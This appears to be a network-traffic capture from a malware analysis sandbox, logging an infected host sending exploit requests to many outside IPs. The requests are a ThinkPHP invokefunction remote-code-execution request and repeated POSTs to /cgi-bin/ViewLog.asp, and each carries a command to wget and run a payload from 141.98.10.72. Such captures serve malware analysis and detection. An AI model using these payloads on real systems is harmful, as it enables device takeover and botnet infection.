                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        992192.168.2.144860895.110.186.580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:13.490037918 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:13.709460974 CET355INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.14.0 (Ubuntu)
                                                        Date: Wed, 14 Feb 2024 08:35:13 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 182
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        993192.168.2.144699895.101.214.23080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:13.491019964 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:13.711751938 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:35:13 GMT
                                                        Date: Wed, 14 Feb 2024 08:35:13 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 66 38 37 31 30 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 37 31 33 26 23 34 36 3b 31 35 31 34 65 65 64 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;f871002&#46;1707899713&#46;1514eed9</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        994192.168.2.144526485.229.16.1988080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:14.106765032 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:14.331048012 CET561INHTTP/1.1 404 Not Found
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Headers: Content-Type
                                                        Content-Type: text/html
                                                        Content-Length: 345
                                                        Date: Wed, 14 Feb 2024 08:35:13 GMT
                                                        Server: WebServer
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        995192.168.2.143714285.10.237.1398080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:14.106782913 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:14.318928003 CET556INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:14 GMT
                                                        Server: Apache/2.4.38 (Debian)
                                                        Content-Length: 362
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        996192.168.2.144576894.110.51.1438080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:14.106806993 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        997192.168.2.144774694.123.144.2178080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:14.119837999 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        998192.168.2.143662695.85.191.1178080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:14.123644114 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        999192.168.2.144505862.29.73.558080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:14.139381886 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1000192.168.2.144257831.200.24.1728080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:14.139759064 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1001192.168.2.146038894.121.186.278080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:14.141285896 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1002192.168.2.143794694.123.141.888080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:14.141447067 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1003192.168.2.143709094.110.19.1098080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:14.318818092 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1004192.168.2.145996431.136.249.2018080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:14.330684900 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:15.011727095 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:16.387635946 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:19.139555931 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:24.771302938 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:35.778956890 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:59.074008942 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1005192.168.2.145767494.121.36.1818080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:14.367161989 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1006192.168.2.143655294.121.16.1288080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:14.367481947 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1007192.168.2.145705662.37.227.388080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:14.545223951 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:14.762984991 CET1286INHTTP/1.0 400 Bad request: request URL port mismatch
                                                        Content-type: text/html; charset="utf-8"
